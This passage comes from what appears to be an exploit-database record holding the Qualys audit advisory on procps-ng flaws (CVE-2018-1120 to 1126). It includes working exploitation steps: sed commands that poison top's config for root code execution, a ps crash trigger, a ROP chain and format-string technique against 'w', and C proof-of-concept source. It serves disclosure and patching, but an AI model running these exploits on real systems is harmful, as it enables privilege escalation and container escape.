sanity check,\r\nand is later used by window_show() to access a struct FLD_t which\r\ncontains a function pointer \"sort\":\r\n \r\n5876 static int window_show (WIN_t *q, int wmax) {\r\n....\r\n5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);\r\n \r\n 40de01: ba 08 00 00 00 mov $0x8,%edx\r\n 40de06: 48 c1 e0 05 shl $0x5,%rax\r\n 40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx\r\n 40de11: e8 7a 47 ff ff callq 402590 <[email\u00a0protected]>\r\n \r\nTo take control of this function pointer, we will write 0x40a989's LSW\r\n(Least Significant Word, 32 bits) into \"graph_mems\" and 0x40a989's MSW\r\n(Most Significant Word, 32 bits) into \"summclr\", which are read from the\r\nconfiguration file and written to 0x63ed30 (and 0x63ed34), a memory\r\nlocation accessible by 0x619930+(sortindx<<0x5):\r\n \r\n3676 static const char *config_file (FILE *fp, const char *name, float *delay) {\r\n....\r\n3710 if (3 > fscanf(fp, \"\\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\\n\"\r\n3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))\r\n3712 return p;\r\n3713 if (4 != fscanf(fp, \"\\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\\n\"\r\n3714 , &w->rc.summclr, &w->rc.msgsclr\r\n3715 , &w->rc.headclr, &w->rc.taskclr))\r\n3716 return p;\r\n \r\n 406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14\r\n .......\r\n 406fa9: 41 56 push %r14\r\n .......\r\n 406fb3: e8 d8 b7 ff ff callq 402790 <[email\u00a0protected]>\r\n .......\r\n 406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx\r\n .......\r\n 406fe5: e8 a6 b7 ff ff callq 402790 <[email\u00a0protected]>\r\n \r\nNext, we modify the configuration file's \"graph_mems\", \"summclr\", and\r\n\"sortindx\" accordingly:\r\n \r\n$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc\r\n \r\n$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc\r\n \r\n$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc\r\n \r\nLast, we turn off the View_MEMORY bit in the configuration file's\r\n\"winflags\", to prevent summary_show() from crashing because of our\r\nout-of-bounds \"graph_mems\":\r\n \r\n314 #define View_MEMORY 0x001000 // 'm' - display memory summary\r\n \r\n5418 static void summary_show (void) {\r\n....\r\n5499 if (isROOM(View_MEMORY, 2)) {\r\n....\r\n5540 if (w->rc.graph_mems) {\r\n....\r\n5559 ix = w->rc.graph_mems - 1;\r\n....\r\n5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);\r\n \r\n$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\\([0-9]*\\).*'/'\\1'/`\r\n$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc\r\n \r\nThen, if an administrator executes top in /tmp, without a HOME\r\nenvironment variable (or with an empty HOME environment variable):\r\n \r\n# cat /tmp/top.*\r\ncat: '/tmp/top.*': No such file or directory\r\n \r\n# cd /tmp\r\n# env -u HOME top\r\n...\r\n signal 11 (SEGV) was caught by top, please\r\n see http://www.debian.org/Bugs/Reporting\r\nSegmentation fault (core dumped)\r\n \r\n# cat /tmp/top.*\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n========================================================================\r\n4. Denial of Service in ps (CVE-2018-1123)\r\n========================================================================\r\n \r\nps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an\r\nmmap-based buffer overflow of outbuf (ps's output buffer):\r\n \r\n 401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){\r\n 402 char *endp = outbuf;\r\n 403 int rightward = max_rightward;\r\n 404 int fh = forest_helper(outbuf);\r\n 405 \r\n 406 endp += fh;\r\n 407 rightward -= fh;\r\n 408 \r\n 409 if(pp->cmdline && !bsd_c_option)\r\n 410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);\r\n 411 else\r\n 412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);\r\n 413 \r\n 414 if(bsd_e_option && rightward>1) {\r\n 415 if(pp->environ && *pp->environ) {\r\n 416 *endp++ = ' ';\r\n 417 rightward--;\r\n 418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);\r\n 419 }\r\n 420 }\r\n 421 return max_rightward-rightward;\r\n 422 }\r\n \r\nThe number of bytes written to endp by the escape*() functions is added\r\nto endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.\r\nNormally \"rightward\" prevents this buffer overflow, because the maximum\r\nnumber of \"cells\" written to outbuf is OUTBUF_SIZE, and is equal to the\r\nnumber of \"bytes\" written to outbuf; but not in escape_str_utf8():\r\n \r\n 36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){\r\n ..\r\n 50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))\r\n ..\r\n 78 int wlen = wcwidth(wc);\r\n ..\r\n100 memcpy(dst, src, len);\r\n101 my_cells += wlen;\r\n102 dst += len;\r\n103 my_bytes += len;\r\n104 src += len;\r\n \r\nFor example, in the \"en_US.UTF-8\" locale, the multibyte sequence\r\n\"\\xf4\\x81\\x8e\\xb6\" consumes 4 bytes, but only 1 cell, and an easy\r\ntrigger for one of the outbuf overflows is:\r\n \r\n$ (A=`python -c 'print \"\\xf4\\x81\\x8e\\xb6\" * 32767'` exec -a `python -c 'print \"A\" * 65535'` sleep 60) &\r\n[1] 2670\r\n \r\n# env LANG=en_US.UTF-8 ps awwe\r\n PID TTY STAT TIME COMMAND\r\n...\r\nSignal 11 (SEGV) caught by ps (procps-ng version 3.3.10).\r\n 2670 pts/0 S 0:00ps:display.c:66: please report this bug\r\nSegmentation fault\r\n \r\nThis buffer overflow is a denial of service only (not an LPE), because\r\nps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an\r\neffective guard page):\r\n \r\n2147 void init_output(void){\r\n....\r\n2164 outbuf = mmap(\r\n2165 0,\r\n2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses\r\n2167 PROT_READ | PROT_WRITE,\r\n2168 MAP_PRIVATE | MAP_ANONYMOUS,\r\n2169 -1,\r\n2170 0\r\n2171 );\r\n....\r\n2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page\r\n \r\n \r\n========================================================================\r\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\r\n========================================================================\r\n \r\n========================================================================\r\n5.1. Vulnerability\r\n========================================================================\r\n \r\nlibprocps's file2strvec() function parses a process's /proc/PID/cmdline\r\n(or /proc/PID/environ), and creates an in-memory copy of this process's\r\nargv[] (command-line argument strings, and pointers to these strings).\r\nfile2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but\r\nnot PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or\r\nPROC_FILLENV but not PROC_EDITENVRCVT).\r\n \r\nfile2strvec() is vulnerable to three integer overflows (of \"tot\", \"c\",\r\nand \"tot + c + align\"):\r\n \r\n 660 static char** file2strvec(const char* directory, const char* what) {\r\n 661 char buf[2048]; /* read buf bytes at a time */\r\n 662 char *p, *rbuf = 0, *endbuf, **q, **ret;\r\n 663 int fd, tot = 0, n, c, end_of_file = 0;\r\n 664 int align;\r\n ...\r\n 670 /* read whole file into a memory buffer, allocating as we go */\r\n 671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {\r\n ...\r\n 686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */\r\n 687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */\r\n 688 tot += n; /* increment total byte ctr */\r\n ...\r\n 697 endbuf = rbuf + tot; /* count space for pointers */\r\n 698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));\r\n 699 for (c = 0, p = rbuf; p < endbuf; p++) {\r\n 700 if (!*p || *p == '\\n')\r\n 701 c += sizeof(char*);\r\n ...\r\n 705 c += sizeof(char*); /* one extra for NULL term */\r\n 706 \r\n 707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */\r\n \r\nTo the best of our knowledge, the integer overflows of \"c\" and \"tot + c\r\n+ align\" are not exploitable beyond a denial of service: they result in\r\nan mmap-based buffer overflow of rbuf, but with pointers only (pointers\r\nto our command-line argument strings, and a NULL terminator). Similarly,\r\nwe were unable to exploit the integer overflow of \"tot\" on 32-bit.\r\n \r\nOn 64-bit, however, the integer overflow of \"tot\" results in a memcpy()\r\nof arbitrary bytes (our command-line arguments) to an offset of roughly\r\n-2GB below rbuf. Surprisingly, the \"xrealloc(rbuf, tot + n)\" before the\r\nmemcpy() does not exit() when \"tot\" becomes negative, because xrealloc()\r\nincorrectly uses an \"unsigned int size\" argument instead of a size_t\r\n(CVE-2018-1126):\r\n \r\n 66 void *xrealloc(void *oldp, unsigned int size) {\r\n \r\n========================================================================\r\n5.2. Exploitation\r\n========================================================================\r\n \r\nTo exploit the integer overflow of \"tot\" on 64-bit, we are faced with\r\nseveral difficulties:\r\n \r\n- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing\r\n Protector), and FORTIFY.\r\n \r\n- Our exploit must be one-shot, or as close to one-shot as possible: we\r\n may use brute-force if the target procps-ng utility is executed by a\r\n script, but we have only one chance to exploit this vulnerability if\r\n the target utility is executed manually by an administrator.\r\n \r\n- We have no control over the target utility's command-line arguments,\r\n environment variables, or resource limits (it is executed by another\r\n user, administrator, or script), and we have no direct channel for an\r\n information leak (we have no access to the target utility's output,\r\n for example).\r\n \r\n- We were unable to exploit the integer overflow of \"tot\" when rbuf is\r\n mmap()ed (but we were also unable to prove that it is unexploitable);\r\n when the integer \"tot\" overflows, rbuf is an mmap()ed chunk (its size\r\n is roughly 2GB), and because Linux's mmap() is a top-down allocator,\r\n we believe that:\r\n \r\n . rbuf must be allocated in a hole of the mmap-space (to survive the\r\n memcpy() at a negative offset below rbuf);\r\n \r\n . it is impossible to make such a large hole (in procps-ng, calls to\r\n the malloc functions are extremely rare).\r\n \r\nDespite these difficulties, we developed proof-of-concept exploits\r\nagainst the procps-ng utility \"w\" on Ubuntu 16.04 (a one-shot exploit\r\nagainst a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly\r\none-shot exploit against a full RELRO, PIE w): if we first force \"w\" to\r\nmalloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than\r\nmmap_threshold = 128KB), then malloc() will not call mmap() anymore, but\r\nwill call brk() instead, even for chunks larger than mmap_threshold. The\r\n2GB rbuf (after the integer overflow of tot) will therefore be allocated\r\non the heap by brk(), and because brk() is a bottom-up allocator, we can\r\neasily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning\r\nof the heap:\r\n \r\n- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure\r\n and its function pointers;\r\n \r\n- if w is a PIE, we overwrite the glibc's internal *gettext() structures\r\n and transform this memory corruption into a format-string exploit.\r\n \r\nTo force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs\r\n(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,\r\n/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,\r\neven on 64-bit). This is not an unusual setting: large servers (database\r\nservers, container and storage platforms) commonly increase the value of\r\npid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit\r\nour ability to spawn 64K processes: /proc/sys/kernel/threads-max,\r\nRLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,\r\nhowever, these limits are not insuperable obstacles:\r\n \r\n- they may be naturally greater than 64K, depending on the total number\r\n of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or\r\n the value of pid_max (for UserTasksMax);\r\n \r\n- they may not apply to the attacker's user account (for example,\r\n systemd-logind may not at all manage this specific user account);\r\n \r\n- in any case, we do not need to spawn 64K concurrent processes: if we\r\n use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need\r\n only a few concurrent processes.\r\n \r\n========================================================================\r\n5.3. Exploitation details\r\n========================================================================\r\n \r\nOur proof-of-concept exploit spawns five different types of processes\r\n(\"main\", \"mmap\", \"dist\", \"wrap\", and \"srpt\"):\r\n \r\n- a long-lived \"main\" process, which spawns and coordinates the other\r\n processes;\r\n \r\n- 64K long-lived \"mmap\" processes, which guarantee that the ~2GB rbufs\r\n of our \"dist\" and \"wrap\" processes are allocated by brk() in the heap\r\n of our future \"w\" target; the \"mmap\" processes occupy the lowest PIDs\r\n available, to avoid interference from other processes with the heap\r\n layout of w;\r\n \r\n- a long-lived \"dist\" (\"distance\") process, whose /proc/PID/cmdline is\r\n carefully constructed to cover the exact distance between our target\r\n structure (at the beginning of w's heap) and the rbuf of our \"wrap\"\r\n process (at the end of w's heap);\r\n \r\n- a long-lived \"wrap\" (\"integer wrap\") process, which overflows the\r\n integer \"tot\" and overwrites our target structure at the beginning of\r\n w's heap (with the memcpy() at rbuf - 2GB);\r\n \r\n- short-lived \"srpt\" (\"simulate readproctab\") processes, which measure\r\n the exact distance between our target structure (at the beginning of\r\n w's heap) and the rbuf of our \"wrap\" process (at the end of w's heap);\r\n because this distance depends on an accurate list of processes running\r\n on the system, our exploit regularly spawns \"srpt\" processes until the\r\n distance stabilizes (it is particularly unstable after a reboot).\r\n \r\nWe use a few noteworthy tricks in this exploit:\r\n \r\n- we do not fork() but clone() the \"mmap\" processes (we use the flags\r\n CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but\r\n not CLONE_THREAD, because each process must have its own /proc/PID\r\n entry): this is much faster, and significantly reduces the memory\r\n consumption of our exploit (the target \"w\" process itself already\r\n consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the\r\n \"mmap\", \"dist\", and \"wrap\" processes);\r\n \r\n- we analyze the ~2GB command-line argument strings of our \"dist\" and\r\n \"wrap\" processes, to detect repeated patterns and replace them with\r\n our equivalent file-backed mmap()s (this further reduces the memory\r\n consumption of the exploit); moreover, we replace the argv[] pointers\r\n of these processes with PROT_NONE mmap()s (hundreds of megabytes that\r\n are never accessed);\r\n \r\n- we initially simulated readproctab() with our own exploit code, but\r\n eventually switched to a small LD_PRELOAD library that instruments the\r\n real \"w\" utility and provides more accurate measurements.\r\n \r\nThere is much room for improvement in this proof-of-concept exploit: for\r\nexample, it depends on the exact distance between our target structure\r\n(at the beginning of w's heap) and the rbuf of our \"wrap\" process (at\r\nthe end of w's heap), but this distance is hard to measure inside a\r\ncontainer, because processes running outside the container are not\r\nvisible inside the container (brute-force may be a solution if the\r\ntarget utility is executed by a script, but not if it is executed\r\nmanually by an administrator; better solutions may exist).\r\n \r\n========================================================================\r\n5.4. Non-PIE exploitation\r\n========================================================================\r\n \r\nIn this section, we describe our simplest proof-of-concept exploit,\r\nagainst the non-PIE \"w\" on Ubuntu 16.04: we overflow the integer \"tot\"\r\nin file2strvec(), we overwrite the PROCTAB structure and its function\r\npointers, and we jump into the executable segment of w. However, w is\r\nvery small and contains no useful gadgets, syscall instructions, or\r\nlibrary calls. Instead, we use a technique pioneered by Nergal in\r\nhttp://phrack.org/issues/58/4.html (\"5 - The dynamic linker's\r\ndl-resolve() function\"):\r\n \r\nWe jump to the very beginning of w's PLT (Procedure Linkage Table),\r\nwhich calls _dl_runtime_resolve() and _dl_fixup() with a \"reloc_arg\"\r\nthat we control (it is read from the stack) and that indexes our own\r\nfake Elf64_Rela structure (in w's heap), which in turn indexes a fake\r\nElf64_Sym structure, which in turn indexes a string that we control and\r\nthat allows us to call any library function, by name (even if it does\r\nnot appear in w's PLT). The obvious choice here is the \"system\"\r\nfunction:\r\n \r\n- the RDI register (the first argument of the function pointer that we\r\n overwrote, and hence the command argument of system()) points to the\r\n PROCTAB structure, whose contents we control;\r\n \r\n- we do not need to worry about the privilege dropping of /bin/sh,\r\n because w is not a set-user-ID executable.\r\n \r\nFinally, we must solve two practical problems to use this dynamic-linker\r\ntechnique against w:\r\n \r\n- our fake ELF structures are located in the heap, but indexed from the\r\n executable, and a random gap separates the heap from the executable:\r\n we therefore allocate four large areas in the heap (large enough to\r\n defeat the randomization of the heap), one for each of our fake\r\n structures (Elf64_Rela, Elf64_Sym, \"system\", and ndx for symbol\r\n versioning);\r\n \r\n- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym\r\n are 24-byte structures: luckily, the last 8 bytes of these structures\r\n are unused, and we therefore truncate our fake structures to 16 bytes.\r\n \r\nFor example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with\r\nthe following ROP chain:\r\n \r\n procfs taskdir tdu df finder reader tfinder\r\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\r\n| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|\r\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\r\n 0xffb8 bytes\r\n \r\n- the first gadget that we execute, 0x4020bb, pivots the stack pointer\r\n to RDI (which points to the very beginning of the PROCTAB structure):\r\n \"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;\"\r\n \r\n- the second gadget that we execute, 0x4029db, increases the stack\r\n pointer by 0xffb8 bytes (it would otherwise crash into the beginning\r\n of the heap, because the stack grows down): \"ret 0xffb8;\"\r\n \r\n- the third gadget that we execute, 0x401100, calls\r\n _dl_runtime_resolve() and _dl_fixup() with our own \"relocarg\" (this\r\n effectively calls system() with the command located at RDI,\r\n \"id>>/tmp/w.$$\"):\r\n \r\n 401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip)\r\n 401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip)\r\n \r\n- the fourth gadget that we execute, 0x402a50, makes a clean exit:\r\n \r\n 402a50: bf 01 00 00 00 mov $0x1,%edi\r\n 402a55: e8 36 e7 ff ff callq 401190 <[email\u00a0protected]>\r\n \r\n$ ./w-exploit-Non-PIE\r\npositive_tot 2147482113\r\ndistance_tot 2147482112\r\ndistance 12024752\r\n...\r\ndistance 12024752\r\noff 279917264\r\nver_beg 2e26ce0 ver_end 5426ce0\r\nrel_beg 15f19fb0 rel_end 18519fb0\r\nstr_beg 2900d280 str_end 2b60d280\r\nsym_beg 3c100570 sym_end 3e700570\r\nreloc_arg 16957128\r\nnentries 5\r\nPOSITIVE_TOT 2147482113\r\nDISTANCE_TO_PT 1\r\nnegwrite_off 2147485183\r\nnentries 1\r\nready\r\n \r\nThen, if an administrator executes w:\r\n \r\n# cat /tmp/w.*\r\ncat: '/tmp/w.*': No such file or directory\r\n \r\n# w\r\n \r\n# cat /tmp/w.*\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n========================================================================\r\n5.5. PIE exploitation\r\n========================================================================\r\n \r\nIn this section, we describe our proof-of-concept exploit against the\r\nPIE \"w\" on Debian 9 and Fedora 27. The first technique that we tried, a\r\npartial overwrite of a function pointer in the PROCTAB structure, does\r\nnot work:\r\n \r\n- we are limited to a 2-byte overwrite, or else we lose the \"one-shot\"\r\n quality of our exploit (we must brute-force the random bits that we\r\n overwrite);\r\n \r\n- the original function pointer refers to a piece of code in libprocps\r\n that offers a very limited choice of gadgets;\r\n \r\n- file2strvec() ends our command-line argument strings (which overwrite\r\n the function pointer) with a null byte, and further reduces the number\r\n of available gadgets.\r\n \r\nOur second, working technique is derived from halfdog's fascinating\r\nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and\r\ntransforms libprocps's integer overflow and memory corruption into a\r\nformat-string exploit:\r\n \r\n- we overwrite the dirname pointer to \"/usr/share/locale\" (a member of\r\n the struct binding malloc()ated at the very beginning of w's heap by\r\n bindtextdomain()) with a pointer to \"/tmp\" -- we do not need to worry\r\n about ASLR, because we arrange for file2strvec() to overwrite dirname\r\n with a pointer to our command-line argument strings; alternatively, we\r\n could overwrite the \"procps-ng\" string (malloc()ated at the beginning\r\n of w's heap by textdomain()), but this would also overwrite the chunk\r\n header of the struct PROCTAB, and would cause a crash in closeproc();\r\n \r\n- we thereby control the translation strings returned by the *gettext()\r\n functions and the _() macro (the overwritten dirname pointer is used\r\n to construct the names of the translation files \".mo\") and therefore\r\n control two format-strings in w's main():\r\n \r\n591 printf(_(\"%-*s TTY \"), userlen, _(\"USER\"));\r\n...\r\n595 printf(_(\" [email\u00a0protected] IDLE JCPU PCPU WHAT\\n\"));\r\n \r\n- we exploit the first format-string to create a pointer to a saved RIP\r\n on the stack, and we write this pointer to the stack itself;\r\n \r\n- we use this pointer, and the second format-string, to overwrite the\r\n saved RIP with the address of a useful libc gadget (we return into\r\n popen() on Debian 9, and wordexp() on Fedora 27).\r\n \r\nHowever, unlike halfdog, we cannot defeat ASLR by simply dumping the\r\ncontents of the stack with a format-string, because we have not access\r\nto the output of \"w\" (it is executed by another user, administrator, or\r\nscript). Instead, we implement Chris Evans's \"read-add-write\" primitive\r\nhttps://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html\r\n(\"Trick #6: co-opting an addition primitive\") with format-strings only.\r\n \r\nWith the first format-string:\r\n \r\n- we \"read\" the LSW (Least Significant Word, 32 bits) of a stack pointer\r\n that is located on the stack itself and hence accessible through the\r\n format-string arguments -- for example, the argv pointer;\r\n \r\n- we \"add\" a distribution-specific constant to this LSW, to make it\r\n point to a saved RIP on the stack -- for example, the saved RIP pushed\r\n onto the stack by the call to printf_positional() in vfprintf();\r\n \r\n- we \"write\" this modified LSW to the LSW of another stack pointer that\r\n is also located on the stack itself and hence accessible through the\r\n format-string arguments -- for example, the argv[0] pointer.\r\n \r\nWith the second format-string:\r\n \r\n- we \"read\" the LSW of a libc pointer that is located on the stack and\r\n hence accessible through the format-string arguments -- for example,\r\n the pointer to __libc_start_main();\r\n \r\n- we \"add\" a distribution-specific constant to this LSW, to make it\r\n point to a useful libc gadget -- for example, popen() or wordexp();\r\n \r\n- we \"write\" this modified LSW to the LSW of a saved RIP on the stack:\r\n we use the pointer (to the saved RIP) created on the stack by the\r\n first format-string.\r\n \r\nTo implement the \"read-add-write\" primitive:\r\n \r\n- we \"read\" the LSW of a pointer (we load it into vfprintf's internal\r\n character counter) through a variable-width specifier such as \"%*R$x\",\r\n where R is the position (among the format-string arguments on the\r\n stack) of the to-be-read pointer;\r\n \r\n- we \"add\" a constant A to this LSW through a constant-width specifier\r\n such as \"%Ax\";\r\n \r\n- we \"write\" this modified LSW to the LSW of another pointer through a\r\n specifier such as \"%W$n\", where W is the position (among the format-\r\n string arguments on the stack) of a pointer to the to-be-overwritten\r\n pointer (for example, in our first format-string we overwrite the LSW\r\n of the argv[0] pointer through the argv pointer, and in our second\r\n format-string we overwrite the LSW of a saved RIP through the\r\n overwritten argv[0] pointer); in summary:\r\n \r\n . if we want to \"add\" a constant to the LSW that we \"read\", we use a\r\n simple format-string such as \"%*R$x%Ax%W$n\", where A is equal to the\r\n constant that we want to add;\r\n \r\n . if we want to \"subtract\" a constant from the LSW that we \"read\", we\r\n use a format-string such as \"%*R$x%W$n%Ax%W$hn\", where A is equal to\r\n 65536 minus the constant that we want to subtract (the smaller the\r\n constant, the higher the probability of success).\r\n \r\nThis generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it\r\nsuffers from three major drawbacks:\r\n \r\n- it requires two different format-strings, because it must reset\r\n vfprintf's internal character counter between the two \"read-add-write\"\r\n primitives;\r\n \r\n- its probability of success is 1/4 (not a one-shot, but not a\r\n brute-force either), because the probability of success of each\r\n \"read-add-write\" primitive is 1/2 (the randomized LSW that is \"read\"\r\n as an \"int width\" must be positive), and the stack is randomized\r\n independently of the libc;\r\n \r\n- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if\r\n the target utility is executed by a script or daemon, but not if it is\r\n executed manually by an administrator (terminal escape sequences may\r\n be used to overcome this drawback, but we did not explore this\r\n possibility yet).\r\n \r\nIt is also possible to implement distribution-specific variants of this\r\ngeneric technique: for example, we developed a Debian-specific version\r\nof our \"w\" exploit that requires only one format-string, has an 11/12\r\nprobability of success (nearly one-shot), and outputs only a few\r\nkilobytes. This is left as an exercise for the interested reader.\n\n# 0day.today [2018-05-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30505"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nProcps-ng - Multiple Vulnerabilities", "edition": 1, "published": "2018-05-30T00:00:00", "title": "Procps-ng - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1126", "CVE-2018-1121", "CVE-2018-1124", "CVE-2018-1120", "CVE-2018-1123", "CVE-2018-1122", "CVE-2018-1125"], "modified": "2018-05-30T00:00:00", "id": "EXPLOITPACK:669B77DE42FC41B271BD53577DECE916", "href": "", "sourceData": "Qualys Security Advisory\n\nProcps-ng Audit Report\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\n1. FUSE-backed /proc/PID/cmdline\n2. Unprivileged process hiding\n3. Local Privilege Escalation in top (Low Impact)\n4. Denial of Service in ps\n5. Local Privilege Escalation in libprocps (High Impact)\n 5.1. Vulnerability\n 5.2. Exploitation\n 5.3. Exploitation details\n 5.4. Non-PIE exploitation\n 5.5. PIE exploitation\nAcknowledgments\nPatches.tar.gz.b64\n\n\n========================================================================\nSummary\n========================================================================\n\nWe performed a complete audit of procps-ng, the \"command line and full\nscreen utilities for browsing procfs, a 'pseudo' file system dynamically\ngenerated by the [Linux] kernel to provide information about the status\nof entries in its process table\" (https://gitlab.com/procps-ng/procps).\nprocps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,\nps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,\nwatch, and the necessary libprocps library.\n\nWe discovered and submitted patches for more than a hundred bugs and\nvulnerabilities in procps-ng; for reference, our patches are available\nat:\n\nhttps://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz\n\nand base64-encoded at the end of this advisory. In the remainder of this\nadvisory, we present our most interesting findings:\n\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\n\n An attacker can block any read() access to /proc/PID/cmdline by\n mmap()ing a FUSE file (Filesystem in Userspace) onto this process's\n command-line arguments. The attacker can therefore block pgrep, pidof,\n pkill, ps, and w, either forever (a denial of service), or for some\n controlled time (a synchronization tool for exploiting other\n vulnerabilities).\n\n2. Unprivileged process hiding (CVE-2018-1121)\n\n An unprivileged attacker can hide a process from procps-ng's\n utilities, by exploiting either a denial of service (a rather noisy\n method) or a race condition inherent in reading /proc/PID entries (a\n stealthier method).\n\n3. Local Privilege Escalation in top (CVE-2018-1122)\n\n top reads its configuration file from the current working directory,\n without any security check, if the HOME environment variable is unset\n or empty. In this very unlikely scenario, an attacker can carry out an\n LPE (Local Privilege Escalation) if an administrator executes top in\n /tmp (for example), by exploiting one of several vulnerabilities in\n top's config_file() function.\n\n4. Denial of Service in ps (CVE-2018-1123)\n\n An attacker can overflow the output buffer of ps, when executed by\n another user, administrator, or script: a denial of service only (not\n an LPE), because ps mmap()s its output buffer and mprotect()s its last\n page with PROT_NONE (an effective guard page).\n\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\n\n An attacker can exploit an integer overflow in libprocps's\n file2strvec() function and carry out an LPE when another user,\n administrator, or script executes a vulnerable utility (pgrep, pidof,\n pkill, and w are vulnerable by default; other utilities are vulnerable\n if executed with non-default options). Moreover, an attacker's process\n running inside a container can trigger this vulnerability in a utility\n running outside the container: the attacker can exploit this userland\n vulnerability and break out of the container or chroot. We will\n publish our proof-of-concept exploits in the near future.\n\nAdditionally, CVE-2018-1125 has been assigned to\n0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and\nCVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.\n\n\n========================================================================\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\n========================================================================\n\nIn this experiment, we add a sleep(60) to hello_read() in\nhttps://github.com/libfuse/libfuse/blob/master/example/hello.c and\ncompile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the\ncommand-line arguments of a simple proof-of-concept:\n\n$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello\n$ mkdir /tmp/fuse\n$ ./hello /tmp/fuse\n\n$ cat > fuse-backed-cmdline.c << \"EOF\"\n#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/mman.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <unistd.h>\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\n#define PAGESZ ((size_t)4096)\n\nint\nmain(const int argc, const char * const argv[])\n{\n if (argc <= 0) die();\n const char * const arg_start = argv[0];\n const char * const last_arg = argv[argc-1];\n const char * const arg_end = last_arg + strlen(last_arg) + 1;\n\n if (arg_end <= arg_start) die();\n const size_t len = arg_end - arg_start;\n if (len < 2 * PAGESZ) die();\n\n char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));\n if (addr < arg_start) die();\n if (addr + PAGESZ > arg_end) die();\n\n const int fd = open(\"/tmp/fuse/hello\", O_RDONLY);\n if (fd <= -1) die();\n if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();\n if (close(fd)) die();\n\n for (; {\n sleep(1);\n 